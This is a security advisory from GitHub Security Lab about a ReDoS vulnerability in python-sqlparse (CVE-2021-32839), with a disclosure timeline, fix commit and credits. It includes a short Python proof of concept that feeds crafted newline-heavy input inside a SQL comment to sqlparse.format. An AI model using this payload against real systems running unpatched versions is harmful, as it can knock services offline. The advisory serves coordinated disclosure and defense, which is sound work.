Coordinated Disclosure Timeline
- 2021-08-31: Report sent to albrecht.andi@gmail.com
- 2021-09-06: Draft advisory created. Erik and Rasmus have been invited as collaborators.
- 2021-09-10: Bug is fixed in commit 8238a9e.
- 2021-09-10: Advisory (GHSA-p5w8-wqhj-9hhf) published.
Summary
python-sqlparse contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
python-sqlparse
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.
Vulnerability
The vulnerable regular expression is here.
Please follow these steps to reproduce the issue:
- Install
sqlparse:pip install sqlparse - Run the below with
python3:
import sqlparse
attack = '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t'
sql = 'select * from bar /* ' + attack + '*/'
res = sqlparse.format(sql, strip_comments=True)
print(res)
Impact
This issue may lead to a denial of service.
CVE
- CVE-2021-32839
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-107 in any communication regarding this issue.